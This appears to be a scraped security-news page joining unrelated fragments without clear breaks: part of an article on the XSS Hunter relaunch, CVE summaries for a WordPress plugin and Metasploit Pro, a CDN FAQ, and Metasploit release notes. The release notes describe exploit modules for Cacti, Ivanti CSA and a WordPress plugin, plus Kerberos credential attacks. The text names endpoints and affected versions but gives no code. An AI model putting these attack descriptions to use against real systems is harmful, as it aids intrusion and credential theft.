Truffle Security has integrated the lite version of its TruffleHog tool into the new XSSHunter, enabling it to scan HTML pages for secrets such as AWS, GCP, and Slack keys. It will also scan tested websites for source code leaks via .git directories.

“We saw an opportunity to both address privacy concerns as well as give the cybersecurity community new capabilities within the XSS Hunter tool,” Ayrey said.

Ayrey said Mandatory was supportive of the effort and helped out in the process. Truffle Security plans to add more features to XSS Hunter in the future, including adding a more complete version of TruffleHog.

Mandatory, who described XSS Hunter as his long time passion project, will continue to maintain the open source xsshunter-express repository “more dutifully in the future to support those who wish to self-host their own instance”.

“When I first built the service many people didn’t really believe that blind XSS was a ‘real’ concern,” he said. “Today I don’t think anyone doubts the pervasiveness and severity of these vulnerabilities, so it has pretty much achieved what it was meant to do.”

YOU MAY ALSO LIKE Meet TruffleHog – a browser extension for finding secret keys in JavaScript code

Truffle Security relaunches XSS Hunter tool with new features

The All-in-One WP Migration WordPress plugin before 7.63 uses the wrong content type, and does not properly escape the response from the ai1wm_export AJAX action, allowing an attacker to craft a request that when submitted by any visitor will inject arbitrary html or javascript into the response that will be executed in the victims session. Note: This requires knowledge of a static secret key

CVE-2022-2546

By Owais Sultan
What is a CDN? How can businesses benefit from a CDN? and What to look for in a CDN provider?
This is a post from HackRead.com Read the original post: Content Delivery Network (CDN) FAQs

Content Delivery Networks (CDNs) have become increasingly popular among businesses of all sizes in recent years. They offer a host of benefits to businesses, which can help to aid the smooth running of operations and boost reputation, efficiency, reliability, security, and the business’s bottom line. This is why they have gained such popularity among businesses in a wide variety of industries.

If you are considering investing in CDN services, you need to ensure you choose the right solution and provider for your business’s needs. Additionally, you should do thorough research to learn how these solutions can help your business.

You can learn about everything from the convenience of integrated CDN solutions to how CDN can help your business when you conduct research. Looking at FAQs about CDN services and solutions can also help; we have provided a sample of common questions and answers below.

**Some Common Questions**

If you want to get to grips with CDN solutions and how they could help your business, here are a few of the many common questions and answers:

**What Is a Content Delivery Network?**

A CDN is a collection of servers that are geographically distributed and work in tandem to ensure the speedy, efficient, and reliable delivery of internet content. It enables the swift transfer of assets required for loading Internet content, including javascript files, HTML pages, videos, images, and more.

The popularity of CDNs means that most web traffic is served through them, including for high-traffic sites such as Facebook and Amazon.

**Does a CDN Replace Web Hosting?**

Another common question is whether a CDN replaces web hosting; the answer is no. CDNs do not host content, but they do help to cache content to improve performance. Standard hosting services often do little to boost performance; this is where a CDN can help. By reducing hosting bandwidth through caching, the CDN can help improve performance, reduce interruptions, boost security, and even cut costs.

**How Can Businesses Benefit from a CDN?**

Following the previous question and answer, there are many ways in which businesses can benefit from CDNs, boosting their popularity. You will find that this is a cost-effective solution; it can reduce downtime, boost performance, provide greater security, and help to speed things up, among other things.

**What Do You Look for in a CDN Provider?**

Many people are eager to know what they should look for in a CDN service provider, and there are several key factors to keep in mind. Of course, the cost of the solution is an important factor to help keep your business within budget.

However, you also need to look at things such as DNS response times, network connectivity, throughput and wait times, and cache hit-or-miss ratios, among other things.

**Conclusion**

In conclusion, Content Delivery Networks are a powerful tool for businesses that need to improve their website’s performance, scalability and security. With the help of this FAQ, we hope that readers have been able to better understand the basics of CDNs and can now decide whether they should consider using one for their website.

As with any technology, there are both advantages and disadvantages that must be considered before investing in a Content Delivery Network.

1.  Cloud Hacking – Why API Remains the Biggest Threat?
2.  VPS Hosting Vs. Dedicated Servers – Which Is Better?
3.  Managed Cloud Hosting vs. Unmanaged Cloud Hosting
4.  5 WordPress Security Solutions with Free SSL Certificates
5.  How Web Application Firewall (WAF) protects your website

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

Content Delivery Network (CDN) FAQs

Rapid7 Metasploit Pro versions 4.21.2 and lower suffer from a stored cross site scripting vulnerability, due to a lack of JavaScript request string sanitization. Using this vulnerability, an authenticated attacker can execute arbitrary HTML and script code in the target browser against another Metasploit Pro user using a specially crafted request. Note that in most deployments, all Metasploit Pro users tend to enjoy privileges equivalent to local administrator.

*   Pro: We completed dependency updates required to support the latest Metasploit Framework version 6.3.
    
*   Pro: We completed a periodic update of the Java Runtime to maintain a good security posture.
    
*   PR 16685 - Updates the Kerberos Authentication support to include multiple new encryption types, which will allow Kerberos Authentication to work against newer targets that have older encryption types disabled.
    
*   PR 16689 - Adds support for host addresses in kerberos tickets.
    
*   PR 16700 - Updates LDAP modules to support Kerberos and NTLM authentication.
    
*   PR 16749 - Adds Kerberos Authentication support to WinRM modules.
    
*   PR 16760 - Updates WinRM sessions to support delegated Kerberos tickets, to be able to access additional network resources from the compromised server.
    
*   PR 16770 - This enables the reuse of previously obtained CCache files for MSSQL, SMB, WinRM, and LDAP authentication. After a successful authentication using Kerberos, tickets are stored in CCache files. They will be reused for subsequent authentications without having to renegotiate new Kerberos tickets.
    
*   PR 17025 - Adds a new USER_RID option to the Kerberos ticket forging module auxiliary/admin/kerberos/forge_ticket.
    
*   PR 17340 - The Python Meterpreter has been updated to warn that the bind information is ignored when a reverse port forward is created to prevent confusion when this information is supplied by a user.
    
*   PR 17343 - This makes performance improvements to the windows/local/unquoted_service_path module.
    
*   PR 17373 - Adds ticket flags when presenting krb5 ccaches on msfconsole.
    
*   PR 17374 - Adds klist command support to list Kerberos tickets in the database.
    
*   PR 17451 - This adds netntlm and netntlmv2 hashes support to auxiliary/analyze/crack_windows module.
    
*   PR 17456 - This PR adds a new KrbOfferedEncryptionTypes option that allows users to configure what encryption types are used with the KDC.
    
*   PR 17466 - This updates the auxiliary/scanner/smb/smb_version module to store additional service information in the database so it can be viewed later.
    
*   PR 17473 - Updates the docs site to have an edit link at the bottom of each page which will take you to the corresponding markdown file on Github for editing.
    
*   PR 17475 - Enables the datastore\_fallbacks feature flag by default. This is a rewrite of Metasploit's datastore to fix multiple bugs and edge-cases. The unset command will now consistently unset previously set datastore values, so that default values are used once again.
    
*   PR 17480 - A new alias has been added for payloads called exploit which will perform the same action as to_handler, to help users familiar with exploit modules to use the same familiar exploit method to open handlers when using payloads.
    
*   PR 17518 - A new adapter has been added to run Python payloads on Windows. This is notably useful for testing Python payloads as SYSTEM or delivered on demand through an exploit module such as psexec.
    
*   PR 17519 - Improves the SMTP delivery error handling for the auxiliary/client/smtp/emailer module.
    
*   PR 17526 - Updates the show options and show advanced command to visually group options with the same conditions together, such as options that require an action or datastore value to be set.
    
*   PR 17535 - This adds NTLM hash recover to the kerberos/get\_ticket module.
    
*   PR 17539 - Adds additional error handling for Kerberos error codes.
    

*   Pro: We addressed CVE-2023-0599, a stored XSS vulnerability on the individual host services page reported by Michael Caruso. Thank you for the coordinated disclosure.
    
*   Pro: We improved the CLI startup process to ensure running tasks are no longer interrupted by starting a Pro console.
    
*   PR 17385 - This PR fixes the file write and file append methods to return the expected Boolean values rather than nil.
    
*   PR 17455 - Fixes an issue where Kerberos responses could not be received in smaller chunks, such as in bandwidth restricted networks.
    
*   PR 17482 - Fixes a connection issue with reverse\_https stagers that are executed on Windows servers attempting to negotiate TLS1 when Metasploit was using OpenSSL3.
    
*   PR 17491 - A bug has been fixed in the lib/msf/core/exploit/remote/ldap.rb library that handles LDAP communications for several modules to ensure that failures use the right namespace when throwing errors to prevent crashes.
    
*   PR 17497 - This fixes an error where modules that issue certificates (icpr\_cert and now auxiliary/admin/dcerpc/cve\_2022\_26923\_certifried) would crash if the response from the server was that the certificate was submitted and no certificate was returned. This updates the code to check if the certificate is present before attempting to process it.
    
*   PR 17516 - The version of metasploit-payloads has been bumped up to add support for dual IPv4/IPv6 stacks to Python Meterpreter, add support for enumerating desktops with the enumdesktops command to Python Meterpreter, and also add support for binding to the specified localhost to compiled versions of Meterpreter.
    
*   PR 17525 - Fixes a deprecation warning when using socks proxy support in Metasploit.
    
*   PR 17541 - Fixes a crash that occurs when domain option is set to blank.
    
*   PR 17549 - Updates the inspect_ticket module to output a user friendly error if the ticket decryption has failed, i.e. due to an invalid decryption key.
    

*   PR 16625 - Adds a new scanner/kerberos/kerberos_login module for bruteforcing and verifying credentials against a Kerberos server. Accounts which do not require preauthnetication, i.e. AS-REP Roastable accounts, will have the hashes output for offline cracking.
    
*   PR 17348 - This PR adds a module that performs a DoS attack on Mirage Firewall versions 0.8.0-0.8.3.
    
*   PR 17407 - This adds an exploit that targets various versions of Cacti network-monitoring software. For versions 1.2.22 and below, there exists an unauthenticated command injection vulnerability in remote_agent.php that when exploited, will result in remote code execution as the user running the Cacti server.
    
*   PR 17449 - A new module has been added for CVE-2021-44529, an unauthenticated code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512. Successful exploitation requires sending a crafted cookie to the client endpoint at /client/index.php to get command execution as the nobody user.
    
*   PR 17479 - This adds an exploit module that leverages an unauthenticated SQLi against Wordpress plugin Paid Membership Pro. This vulnerability is identified as CVE-2023-23488 and affects versions prior to 2.9.8. This module retrieves Wordpress usernames and password hashes using Time-Based Blind SQL Injection technique.
    
*   PR 17533 - Enhances the auxiliary/admin/kerberos/get\_ticket module with PKINIT functionality.

Tag

#java